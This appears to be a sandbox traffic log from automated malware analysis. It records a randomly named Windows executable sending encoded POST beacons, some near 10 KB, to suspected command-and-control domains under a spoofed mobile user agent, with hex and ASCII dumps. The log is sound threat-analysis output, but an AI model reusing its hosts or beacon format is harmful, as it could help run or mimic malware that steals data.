sL9tFJ=alDtrIfVX0nj0l8Aa3xYfYnrqOPdoDWIQ6UtL1zTEoyXVGrYRGmbycqQO+oVH/FRUnj2bwhQC6cimO5JqIKj1Y+VoI65IQz3xZKNT/LXYOZ6uf3VIiJ3EFjIkfZLCzRB3hkkonxOvyKtKbs5zoTRK0d99fV/RO1EeW7AIsVb+nxXP+9ghremltRwEvyG5ZGtSA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49769	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:38.495322943 CEST	743	OUT	POST /oigd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.comrade.lol Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.comrade.lol Referer: http://www.comrade.lol/oigd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 61 6c 44 74 72 49 66 56 58 30 6e 6a 37 6d 6b 41 58 30 5a 59 4c 49 6e 71 76 4f 50 64 6a 6a 57 4d 51 36 51 74 4c 77 54 35 48 61 57 58 57 6d 37 59 65 6e 6d 62 2f 38 71 51 46 65 6f 4d 66 66 46 65 55 6e 2f 2b 62 78 4e 51 43 36 34 69 6d 4f 70 4a 72 2f 57 6b 30 49 2b 58 78 59 36 37 47 77 7a 33 78 5a 4b 4e 54 2f 66 78 59 4f 42 36 76 72 4c 56 49 41 78 30 4d 6c 6a 58 73 2f 5a 4c 49 54 52 4e 33 68 6b 47 6f 69 56 6f 76 78 79 74 4b 65 41 35 79 35 54 4f 41 30 64 2f 78 50 55 51 64 4d 45 4e 63 47 6d 32 57 61 56 48 7a 7a 31 67 48 59 73 36 77 61 2f 78 33 74 31 44 5a 6f 37 79 30 61 37 6b 4a 4b 73 31 4a 47 39 43 48 33 56 73 63 56 62 70 4a 6c 74 63 62 6a 6f 3d Data Ascii: sL9tFJ=alDtrIfVX0nj7mkAX0ZYLInqvOPdjjWMQ6QtLwT5HaWXWm7Yenmb/8qQFeoMffFeUn/+bxNQC64imOpJr/Wk0I+XxY67Gwz3xZKNT/fxYOB6vrLVIAx0MljXs/ZLITRN3hkGoiVovxytKeA5y5TOA0d/xPUQdMENcGm2WaVHzz1gHYs6wa/x3t1DZo7y0a7kJKs1JG9CH3VscVbpJltcbjo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49770	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:41.049168110 CEST	10825	OUT	POST /oigd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.comrade.lol Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.comrade.lol Referer: http://www.comrade.lol/oigd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 61 6c 44 74 72 49 66 56 58 30 6e 6a 37 6d 6b 41 58 30 5a 59 4c 49 6e 71 76 4f 50 64 6a 6a 57 4d 51 36 51 74 4c 77 54 35 48 61 65 58 56 51 33 59 52 67 61 62 2b 38 71 51 4d 2b 6f 52 66 66 46 35 55 6e 6e 36 62 78 52 75 43 38 38 69 6d 74 52 4a 73 4e 2b 6b 2b 49 2b 58 2b 34 36 36 49 51 79 31 78 5a 61 4a 54 2f 50 78 59 4f 42 36 76 71 62 56 63 43 4a 30 42 46 6a 49 6b 66 59 45 43 7a 51 59 33 68 73 38 6f 69 52 34 76 42 53 74 4c 2b 51 35 78 4c 4c 4f 4d 30 64 68 79 50 55 49 64 4d 49 4f 63 47 4b 41 57 61 4a 39 7a 30 39 67 46 4f 77 68 6b 65 71 75 67 72 74 46 4b 4b 53 55 77 61 2f 31 4a 70 78 4e 41 6e 31 4c 46 46 70 58 66 46 61 62 64 55 6c 38 4e 45 35 79 75 5a 51 42 44 41 78 78 61 70 79 62 55 48 44 37 67 46 31 68 4b 7a 6a 41 66 37 47 69 51 4c 63 39 39 37 41 50 65 2b 7a 76 61 44 34 56 56 4c 61 6b 52 52 4b 34 7a 6a 53 75 64 75 56 75 59 36 76 4b 66 55 43 71 66 44 46 46 6d 53 52 67 65 37 7a 51 56 47 6e 4d 59 73 61 32 6f 65 35 49 63 6a 64 59 48 2b 32 4f 58 76 61 74 52 4d 53 30 31 67 47 55 72 63 36 [TRUNCATED] Data Ascii: sL9tFJ=alDtrIfVX0nj7mkAX0ZYLInqvOPdjjWMQ6QtLwT5HaeXVQ3YRgab+8qQM+oRffF5Unn6bxRuC88imtRJsN+k+I+X+466IQy1xZaJT/PxYOB6vqbVcCJ0BFjIkfYECzQY3hs8oiR4vBStL+Q5xLLOM0dhyPUIdMIOcGKAWaJ9z09gFOwhkequgrtFKKSUwa/1JpxNAn1LFFpXfFabdUl8NE5yuZQBDAxxapybUHD7gF1hKzjAf7GiQLc997APe+zvaD4VVLakRRK4zjSuduVuY6vKfUCqfDFFmSRge7zQVGnMYsa2oe5IcjdYH+2OXvatRMS01gGUrc6DNABrTieDmFX1D9OlNpFkJBcvIGTYxBWjB7WlkoS7H4KVcNnqew4xMj109knSgRhyOr8yf99xdyPernkKYtsBNtsjtrHFGN/sw1PgEiWkm+lQQqg7dgjWdPDrwGMgOTWqCBrgkzSjOE7VVG8lqs9MPvOkzaIS+vEav/zcxJ1Q5sKhw9SdjJRb5VmpcpACtCNX4itc8o6dxQE8odw5fKNeP5YpGRbxKyr0eMT/GTU5jorXVdSGZAID5rg91KqbWc7c3cFwnNgysoYFF1KmdF+Foypq66YwpqAg6uZdbb8iogJoCcngl/EgTQcOmAoLDQSwzEH2djftbx3RGVjOnBozUlPKfMijk4rghwcj9p2XZaGAr7IkkQz2g4UnD8WLPUvViaCsfJITfglNRdflwRRo4pnChQ8xiiDFI2SuO0Oah0+uuVVUsx7NfCfRvt3vENEDAm4efzf8ZcxkJfu7EPc2RXNmzscLy0qHWSlixP9oykXEYiDVleTzNPn8+oE15LzsG8Kv0nOQG5rqC+eLt7OrhMeolV467XHHawc7BJFUYefPIpTHLbPurZ1y/WSYMRFtsFNyZdzcznigj3Tuys4fT3is7otPjwFBOILFuCMm+43mXqeouui+kq9n/SKdrOJ1GNKi5/AWDa4V5DlHbtj+SwKxk3wXfsMXa [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49771	3.33.130.190	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:43.587124109 CEST	459	OUT	GET /oigd/?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.comrade.lol Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:25:44.963043928 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 12:25:44 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 4c 39 74 46 4a 3d 58 6e 72 4e 6f 2f 7a 6c 55 6e 72 45 75 46 78 46 54 55 59 6b 47 37 61 65 2b 66 37 2b 70 6c 4b 66 4b 4b 6b 37 45 6b 4c 47 45 64 76 48 4b 30 6a 78 61 6c 61 2b 38 4d 43 65 4e 49 77 57 52 59 70 72 51 48 6e 35 57 42 56 41 63 4a 6c 36 6f 76 78 64 7a 73 2b 37 7a 62 71 53 78 72 7a 6d 4d 42 33 33 7a 62 6d 48 52 70 66 37 4f 73 4d 63 72 71 7a 6f 5a 69 70 79 55 55 34 3d 26 67 42 37 74 3d 78 46 71 58 31 68 43 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	221.121.144.149	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:25:59.752891064 CEST	747	OUT	POST /ljdj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.inf30027group23.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.inf30027group23.xyz Referer: http://www.inf30027group23.xyz/ljdj/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 55 4b 71 76 63 30 4d 76 4a 48 6c 70 54 47 45 38 79 52 78 4b 77 56 54 53 58 4f 55 58 6b 70 6d 62 45 2b 43 6d 72 30 34 69 63 37 39 68 79 71 32 73 58 46 5a 4e 30 71 68 46 48 48 61 30 74 54 6e 69 58 35 77 53 42 38 48 37 74 7a 67 71 49 58 2f 2b 41 47 65 65 67 4b 41 67 33 61 79 43 4c 36 33 38 6f 37 71 4a 36 4b 70 51 77 53 2b 65 7a 48 78 53 55 73 38 70 41 5a 33 5a 73 31 35 66 53 54 49 7a 45 77 71 37 6a 63 41 34 46 46 73 4a 49 5a 47 4a 64 63 63 73 6e 6b 44 65 69 46 38 38 2b 64 6f 6e 58 63 2f 50 77 45 36 55 56 4d 30 42 37 61 72 66 38 63 78 55 4f 49 4c 6a 72 64 6f 4d 39 4f 31 38 72 77 3d 3d Data Ascii: sL9tFJ=UKqvc0MvJHlpTGE8yRxKwVTSXOUXkpmbE+Cmr04ic79hyq2sXFZN0qhFHHa0tTniX5wSB8H7tzgqIX/+AGeegKAg3ayCL638o7qJ6KpQwS+ezHxSUs8pAZ3Zs15fSTIzEwq7jcA4FFsJIZGJdccsnkDeiF88+donXc/PwE6UVM0B7arf8cxUOILjrdoM9O18rw==
Sep 26, 2024 14:26:01.251149893 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-litespeed-tag: 3da_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 26 Sep 2024 12:26:01 GMT server: LiteSpeed Data Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 [TRUNCATED] Data Ascii: 58be"{?")/&>yjT-?IM=*\|U{o[l'SDBmd'%%{Rv C`Y^kleTTo=!KCpDNaov_DL5cZH:1,w&""i_nncDLg(Q!PW0{}/#%7/XKY.aREgWzZn;x4d+Z~#8<;k`\|:Y?N_>['(too!oV(}\|7YuE(xub}u.Ki\CvVI 7=Lak<N6oYV>b)6.1NcwI~~SCT?EGLHn>B6\wOBfr}x}dTBjtcPBRrW(~'d&hv%y)D;e\|_vZ~X`TDD~vIR}kLFW0J4J'
Sep 26, 2024 14:26:01.251202106 CEST	224	IN	Data Raw: f2 64 7e 26 89 b6 da 67 22 a9 34 c5 9a 99 e0 a9 14 4c 82 86 ab 70 a9 ec 86 89 6f 4e 3e 9f 82 24 d7 f7 f8 9f 7b d5 e1 4f 87 6f 58 c7 04 ef 78 f4 88 43 8f ae 8c eb dc 69 1b 87 5f 21 75 e0 3c 50 b9 fd b7 75 35 0e c6 a9 26 ac 24 97 f9 8a 6f 56 5f 6a Data Ascii: d~&g"4LpoN>${OoXxCi_!u<Pu5&$oV_jhE)R!`?^IPJLI%$h$TI!^r.5UsJLyHp@\|w]kK:AV%hSRm8
Sep 26, 2024 14:26:01.251231909 CEST	1236	IN	Data Raw: 41 e7 b3 c2 67 c4 c6 a2 79 79 e7 1d a6 45 6c 56 49 e9 1f 31 1f 5c df a3 8d 01 0d ee 2f 28 7c b8 95 d4 6d 44 f8 f4 ed cf 03 f6 ee 9b fe 82 31 6a db 05 d8 c1 94 1c 54 40 5e 7d d5 a7 d5 d3 2a b0 33 73 be 7b 12 9f 53 c3 d3 aa 76 1e 9f 56 19 bc ae a7 Data Ascii: AgyyElVI1\/(\|mD1jT@^}3s{SvV(gj-/kJHbp\|8u}a8,{\lbR>\|$9:6pzmd%<o__25FGr26pzRN'@pw*KLq7{CSU
Sep 26, 2024 14:26:01.251265049 CEST	1236	IN	Data Raw: 35 d7 dd 6b 41 2c bb 83 24 37 f9 a0 8c 39 a8 fa a5 29 d6 a5 13 f0 c6 7c 26 ad e8 8f f8 a2 41 4f 04 54 e0 62 ff f9 cf b2 e0 d3 96 29 59 e2 ce b2 6e f5 73 fe e7 3f d3 9c b2 2f 57 7c 1f 97 18 b6 90 56 c8 fc 86 13 6e 6f 91 c5 f3 d3 d9 65 5c 7e 3b 94 Data Ascii: 5kA,$79)\|&AOTb)Yns?/W\|Vnoe\~;<=M9MBW=7oZ\|1nvw*DfV:ZC+CNX]_0UVUuu\|90~{=K;?^z+#_U8QBZuaP5V\|uEOs^LGY2
Sep 26, 2024 14:26:01.251296997 CEST	448	IN	Data Raw: 99 7c 7f ce 02 1d 28 4e e2 c7 06 60 79 89 df 1c 55 75 74 44 4a 01 bb 1d 40 72 9b d7 68 1a 9e 29 4f 37 01 e2 9b d0 51 3b 5b 29 63 80 33 19 98 af ad 68 eb a9 1c 25 5f ee c6 68 b4 45 6d 8e 8e 18 38 4f e4 d1 85 b7 ec 7d 92 f7 9a c5 7e 2f 86 2c 00 3b Data Ascii: \|(N`yUutDJ@rh)O7Q;[)c3h%_hEm8O}~/,;C6wDhw;c-8=IIl`0a+_M,E Xx=I4:m0S{`;6bN,uAGl4;\[t64:eY%I,jM
Sep 26, 2024 14:26:01.251327991 CEST	1236	IN	Data Raw: 6c 23 50 5d f2 d0 32 c7 e0 88 f5 42 3c 6a eb c4 20 ee da 07 b9 bb 38 69 0a 41 9a a5 e6 94 86 ff d6 97 a8 39 51 d1 65 5f 1b 15 15 3d ff c0 c4 2e 79 c2 f6 7b 59 ef 0e da 20 99 bb c9 73 9b 90 1a 85 5e 24 68 1b 02 45 05 8f 4d 02 2c 38 d1 2b fd d2 43 Data Ascii: l#P]2B<j 8iA9Qe_=.y{Y s^$hEM,8+C@o?ah=8)[lJgEjJo nAQvMCXFI9bCrT,_zmTGu]QaDAT6uSitC\|gTSc~"^
Sep 26, 2024 14:26:01.251360893 CEST	1236	IN	Data Raw: 7d 1c b3 1f 8c 1c f9 8b 73 f6 90 0d d1 63 d2 7a 2f c0 7e ab ff 20 55 bf 77 50 e6 6b b3 8d 7e 27 03 4a 57 05 23 00 be d1 98 4d 47 37 dc 0c b9 5c 7a f8 28 21 39 99 a5 f4 2d fc b7 d1 6c 7a c2 4a 27 d9 ea 2c d3 bc c4 3b d4 44 6e 79 58 7c db ab 5f bc Data Ascii: }scz/~ UwPk~'JW#MG7\z(!9-lzJ',;DnyX\|_$T5NIGF tA{>GxkxG\|b3}(wQly['T1t^Y'erO1@*W2@n8d <(?7Z\|Xc
Sep 26, 2024 14:26:01.251501083 CEST	448	IN	Data Raw: 80 d4 77 b8 4d e1 0c aa 85 56 0f c8 62 ca 6e 07 c4 3a 24 43 31 42 bf 91 e6 46 f1 92 ee a8 b6 23 d2 47 9a da c9 69 a7 da aa 27 49 e6 e9 20 3b d7 f4 65 f5 00 d4 9b c0 bf bd 68 8b d8 60 33 bc 62 66 8f ab 5d 3f 38 eb c7 c3 d1 d8 42 26 97 61 20 91 cc Data Ascii: wMVbn:$C1BF#Gi'I ;eh`3bf]?8B&a !x>eRixkOit\|Mi2GsTk9jcUp30dnii\{&o{\|ET0V(M"O$}-ekm.=)2']9F_;=a_*BN8
Sep 26, 2024 14:26:01.251533985 CEST	1236	IN	Data Raw: 94 03 51 96 df c5 0e a5 53 72 53 87 de 9d 06 8f 34 ce 62 6a 4a 39 13 43 31 a7 e5 77 20 53 8e a3 5a d2 aa c4 81 70 6d 5d 4e 47 19 d4 37 1b 58 50 55 18 c9 33 e8 c3 9d 16 04 d6 97 73 56 e4 e7 1e b1 6f d3 13 a9 aa 7e 29 3b 5c 07 17 a2 da 9f ab 3e d9 Data Ascii: QSrS4bjJ9C1w SZpm]NG7XPU3sVo~);\>^M!6k6.!.!]4S<~d^-qwbH?\kt1W7FyTM9vf=dd7N]y1Sy~Zd72LG!Uc71Y>
Sep 26, 2024 14:26:01.251564980 CEST	224	IN	Data Raw: 79 24 a3 81 7f 9f ff e6 0d 64 50 0c c5 87 4e 70 96 c6 23 36 b2 44 19 5e 63 f3 06 38 73 0b 7c 91 cc 31 49 a9 c2 cb 03 0e 66 80 8b 17 5f e3 8a bb e8 fd 2e d9 db ba 68 f2 9c 26 ea ec f7 01 37 b4 e9 ec 6a 27 91 4c c8 29 cc e7 56 c4 4b 04 1f 0b d8 ed Data Ascii: y$dPNp#6D^c8s\|1If_.h&7j'L)VK%\|MJY\7JrbU$U:g/0.!tb#p_h40}9buV)=I(U`{bXl':b-zn.
Sep 26, 2024 14:26:01.256498098 CEST	1236	IN	Data Raw: 7c 43 53 5c a1 27 ac 53 72 5c 5d 20 08 ca 43 fa 14 4a 46 95 30 34 6a c4 fd 4f 75 f6 7b ab e5 8f b1 51 71 20 f6 bf 52 62 54 6d 28 c3 fe 57 01 1d 20 08 13 6e c6 89 9a ae d1 5c 41 8f ca 6c 68 6d e9 a4 c3 bf 8c 1d 1a a6 b4 5f 93 f7 04 88 9c b2 56 3d Data Ascii: \|CS\'Sr\] CJF04jOu{Qq RbTm(W n\Alhm_V=Ni=p57Y)oC=DRS]-Y8c+5Q~;J0<W%qV}TPnpuJp\4O(:)1G%*3@`_.}=6ri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49773	221.121.144.149	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:02.291403055 CEST	767	OUT	POST /ljdj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.inf30027group23.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.inf30027group23.xyz Referer: http://www.inf30027group23.xyz/ljdj/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 55 4b 71 76 63 30 4d 76 4a 48 6c 70 54 69 41 38 77 79 5a 4b 78 31 54 52 53 4f 55 58 2b 5a 6d 58 45 2b 2b 6d 72 31 38 79 63 70 70 68 38 75 79 73 55 48 68 4e 6e 61 68 46 54 58 61 78 70 54 6e 35 58 34 4d 6b 42 2b 54 37 74 7a 30 71 49 57 50 2b 42 31 6d 5a 78 4b 41 69 37 36 79 4d 57 4b 33 38 6f 37 71 4a 36 4b 38 33 77 57 53 65 7a 33 74 53 56 4e 38 75 4e 35 33 59 72 31 35 66 66 7a 49 2f 45 77 71 53 6a 59 41 65 46 48 55 4a 49 59 32 4a 64 74 63 6a 74 6b 44 55 76 6c 39 2f 78 73 64 51 61 2b 6d 63 35 79 57 31 49 63 38 59 33 38 36 46 74 74 51 44 63 49 76 51 32 61 68 34 77 4e 49 31 77 38 41 46 6b 32 4b 4c 49 68 51 6e 54 6b 69 56 34 6c 4c 36 7a 63 55 3d Data Ascii: sL9tFJ=UKqvc0MvJHlpTiA8wyZKx1TRSOUX+ZmXE++mr18ycpph8uysUHhNnahFTXaxpTn5X4MkB+T7tz0qIWP+B1mZxKAi76yMWK38o7qJ6K83wWSez3tSVN8uN53Yr15ffzI/EwqSjYAeFHUJIY2JdtcjtkDUvl9/xsdQa+mc5yW1Ic8Y386FttQDcIvQ2ah4wNI1w8AFk2KLIhQnTkiV4lL6zcU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49774	221.121.144.149	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:26:04.838612080 CEST	10849	OUT	POST /ljdj/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.inf30027group23.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.inf30027group23.xyz Referer: http://www.inf30027group23.xyz/ljdj/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 55 4b 71 76 63 30 4d 76 4a 48 6c 70 54 69 41 38 77 79 5a 4b 78 31 54 52 53 4f 55 58 2b 5a 6d 58 45 2b 2b 6d 72 31 38 79 63 70 52 68 38 64 71 73 55 67 4e 4e 6b 61 68 46 50 6e 61 77 70 54 6d 70 58 35 6b 34 42 2b 76 46 74 78 4d 71 4a 30 33 2b 49 67 4b 5a 6f 61 41 69 31 71 79 4e 4c 36 33 54 6f 37 37 43 36 4b 73 33 77 57 53 65 7a 32 64 53 63 38 38 75 50 35 33 5a 73 31 34 4e 53 54 4a 67 45 7a 61 6f 6a 59 4d 4f 46 7a 67 4a 49 37 4f 4a 4e 50 30 6a 68 6b 44 53 6a 46 39 64 78 73 42 50 61 2b 36 51 35 32 57 54 49 65 67 59 30 72 37 73 39 75 63 39 66 65 37 69 6d 49 68 34 34 61 34 5a 77 36 67 63 6a 32 65 38 58 53 78 4f 56 48 43 64 39 31 72 46 6d 70 62 6e 58 39 48 62 6e 56 6d 52 6c 37 34 53 6e 36 65 6a 51 52 49 59 33 70 55 42 71 78 55 63 73 43 48 6d 47 4d 7a 38 44 47 70 76 4c 47 37 30 4a 31 2f 77 6e 45 41 4c 57 50 2b 30 76 58 65 62 79 64 57 39 4a 79 32 48 49 44 65 73 51 75 55 30 71 59 68 49 4f 52 31 39 55 61 63 74 70 4d 4e 6e 41 47 74 44 52 4e 43 35 4c 4c 30 61 2b 6e 55 30 30 62 62 68 64 78 38 [TRUNCATED] Data Ascii: sL9tFJ=UKqvc0MvJHlpTiA8wyZKx1TRSOUX+ZmXE++mr18ycpRh8dqsUgNNkahFPnawpTmpX5k4B+vFtxMqJ03+IgKZoaAi1qyNL63To77C6Ks3wWSez2dSc88uP53Zs14NSTJgEzaojYMOFzgJI7OJNP0jhkDSjF9dxsBPa+6Q52WTIegY0r7s9uc9fe7imIh44a4Zw6gcj2e8XSxOVHCd91rFmpbnX9HbnVmRl74Sn6ejQRIY3pUBqxUcsCHmGMz8DGpvLG70J1/wnEALWP+0vXebydW9Jy2HIDesQuU0qYhIOR19UactpMNnAGtDRNC5LL0a+nU00bbhdx8GjIkXhmKwoNxqGheM56wx4wQrPNYOt2zIeCNFQKd8AsN3wxvYV26UjOmD4Pg33aZ3FU0ZjKSfeCVqyzQXnH1IGlEXjwavOPTY8/rq7+Xxf4/v3FavN/0C1Xq/lnvH0opBQBrL3w2MnG+A2Ndn2bkX3fq5AP31OtTEcgOdJOom1MGLWBfAe05TNYRH19UzbTKGYMg1w6hrCneGjDruMuEwMcZEjP5Mib8i3eqxtWXUtHfazDUyVp5oHLAKHbwEycxAkJI/2LNrXamP/DD12L1LTj2wSNrKHw2i19R07C08LC4F/Lx8TfKZ4CA9N6mBl6VVBq5W2f0fbFUbEgdej4MIWoff2Hrh9AkCv9m9b1//49Rtdl0eNjQJRmFPOpHo5KMEYdIFZe9GW8J9vmh8nmmbq9xN3u66Wc8JWRuF4d7jg/QdMpbksxOJVkAgPFan04MAz6r0IicMAa4ZTB/FwIZD+UqfCCitR4314IcXpCsRNRQhR9tG7LxxT6yruaK5bVryi0+haWQqyZjQO1JqkK7rMvLqTDxCIlNd8PK/JVYxziBgPCG3L58zUKjP08W/AEBrMjrgqiW0dWWtrjd6YSPAKT5Z7fMNZ+0JgSzpldnIfuk2nRD/zgQyQvBoefemKI7aiz/QSdCBsGabr2LumIj+aPw4IF6G+Kcla [TRUNCATED]
Sep 26, 2024 14:26:06.334909916 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-litespeed-tag: 3da_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 26 Sep 2024 12:26:06 GMT server: LiteSpeed Data Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 